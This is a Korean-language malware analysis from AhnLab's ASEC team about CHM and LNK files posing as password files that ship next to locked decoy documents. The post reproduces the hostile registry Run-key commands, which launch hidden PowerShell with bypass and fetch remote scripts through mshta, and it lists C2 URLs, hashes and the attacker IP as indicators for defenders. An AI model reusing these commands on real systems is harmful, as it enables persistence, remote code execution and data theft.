패스워드 파일로 위장하여 유포 중인 악성코드

AhnLab Security Emergency response Center(ASEC)은 지난 달 패스워드 파일로 위장하여 정상 문서 파일과 함께 압축 파일로 유포되는 악성코드를 확인하였다. 해당 유형의 악성코드는 정상 문서 파일을 함께 유포함으로써 사용자가 악성 파일임을 알아채기 어렵다. 최근 확인된 악성코드는 CHM과 LNK 형식으로, CHM의 경우 아래에 소개한 악성코드와 동일한 유형으로 같은 공격 그룹에서 제작한 것으로 보인다.

국내 금융 기업 보안 메일을 사칭한 CHM 악성코드 : RedEyes(ScarCruft)

ASEC(AhnLab Security Emergency response Center) 분석팀은 RedEyes 공격 그룹(also known as APT37, ScarCruft) 이 제작한 것으로 추정되는 CHM 악성코드가 국내 사용자를 대상으로 유포되고 있는 정황을 포착하였다. 지난 2월에 소개한 RedEyes 그룹의 M2RAT 악성코드 공격 과정 중 “2.3. 지속성 유지 (Persistence)” 과정에서 사용된 명령어가 이번 공격에서도 동일한 형태로 사용된 것을 확인하였다. 해당 정보를 포함한 CHM 악성코드의 상세한 동작 과정은 아래에서 소개...

CHM과 LNK 파일은 모두 암호가 설정된 정상 문서 파일과 함께 압축되어 유포된 것으로 추정된다. 엑셀 및 한글 파일의 경우 암호가 설정되어 있어 사용자가 암호가 적힌 것으로 보여지는 CHM 및 LNK 파일을 실행하도록 유도한다.

그림 1. 압축 파일 내부

두 유형 모두 동일한 형태로 유포되었지만 최종적으로 실행되는 악성 행위로 보아 서로 다른 그룹에서 제작한 것으로 추정된다.

• CHM 유형

[그림 1]에서 확인된 passwd.chm 또는 Password.chm 실행 시 문서 파일의 암호가 보여지며 내부에 존재하는 악성 스크립트가 실행된다.

그림 2. passwd.chm 실행 시 확인되는 도움말

그림 3. 암호 해제 시 보여지는 신발.xlsx 문서 내용

그림 4. Password.chm 실행 시 확인되는 도움말

그림 5. 암호 해제 시 보여지는 2020_normal_ko.hwp 문서 내용

CHM 파일에서 확인되는 악성 스크립트는 다음과 같이 mshta 프로세스를 통해 악성 url에 존재하는 추가 스크립트를 실행한다.

그림 6. CHM 내 악성 스크립트

mshta 프로세스를 통해 실행된 추가 스크립트는 < 국내 금융 기업 보안 메일을 사칭한 CHM 악성코드 : RedEyes(ScarCruft) > 에서 공유한 명령어와 동일한 형태이다. 실행 시 RUN 키 등록 및 공격자 서버로부터 명령어 수신, 명령 실행 결과 전달의 기능을 수행한다.

그림 7. 1.html에서 확인되는 악성 스크립트

• RUN 키 등록
  레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  값 이름 : icxrNpVd
  값 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
• C2
  공격자 명령 수신 – hxxp://shacc[.]kr/skin/product/mid.php?U=[컴퓨터이름]+[유저이름]
  명령 실행 결과 전달 – hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 인코딩]

그림 8. 11.html에서 확인되는 악성 스크립트

• RUN 키 등록
  레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  값 이름 : aeF
  값 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
• C2
  공격자 명령 수신 – hxxp://141.105.65.165/data//mid.php?U=[컴퓨터이름]+[유저이름]
  명령 실행 결과 전달 – hxxp://141.105.65.165/data/mid.php?R=[BASE64 인코딩]

• LNK 유형

[그림 1]에서 확인된 password.txt.lnk 파일은 실행 시 %temp% 폴더에 암호가 적힌 텍스트 파일과 악성 스크립트 파일을 생성한다.

그림 9. 생성된 추가 스크립트 및 password.txt 파일

그림 10. 암호 해제 시 보여지는 개인정보이용동의서.hwp 문서 내용

VBS 파일은 다음과 같이 hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1에 존재하는 추가 악성 스크립트 실행하는 기능을 수행한다. 

그림 11. 생성된 VBS 파일

해당 URL 형식으로 보아 LNK 유형의 경우 아래 블로그에서 공유한 악성코드와 유사하며 동일한 공격 그룹에서 제작한 것으로 추정된다.

원고 청탁서로 위장한 악성코드 (안보 분야 종사자 대상)

ASEC 분석팀은 01월 08일 안보 분야 종사자를 대상으로 원고 청탁서로 위장한 문서형 악성코드 유포 정황을 확인하였다. 확보된 악성코드는 워드 문서 내 External 개체를 통해 추가 악성 매크로를 실행한다. 이러한 기법은 템플릿 인젝션(Template Injection) 기법으로 불리며 이전 블로그를 통해 유사한 공격 사례를 소개한 바 있다. 워드 문서를 실행하면 공격자 C&C 서버로부터 추가 악성 워드 매크로 문서를 다운로드 받아 실행한다. 추가로 실행되는 매크로는 사용자가 백그라운드에서 매크로 코드가 실행되는 것을 눈치채지 못하게 하기위해 정상 문서 파일도 함께 실행되도록 작성되어 있다. 공격자가 함께 유포한...

해당 유형의 악성코드는 공격자의 의도에 따라 다양한 악성 행위가 수행될 수 있다. 또한, 다양한 공격 그룹에서 정상 파일을 함께 유포하는 방식을 사용하고 있어 현재 확인된 CHM과 LNK 파일 외에도 다양한 형식의 악성코드가 존재할 것으로 예상된다. 이렇듯 다양한 형식의 악성코드가 국내 사용자를 대상으로 유포되고 있어 사용자는 메일 수신 시 발신인을 반드시 확인하고 첨부 파일 실행 시 각별히 주의해야 한다.

[파일 진단]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)

[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK

C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.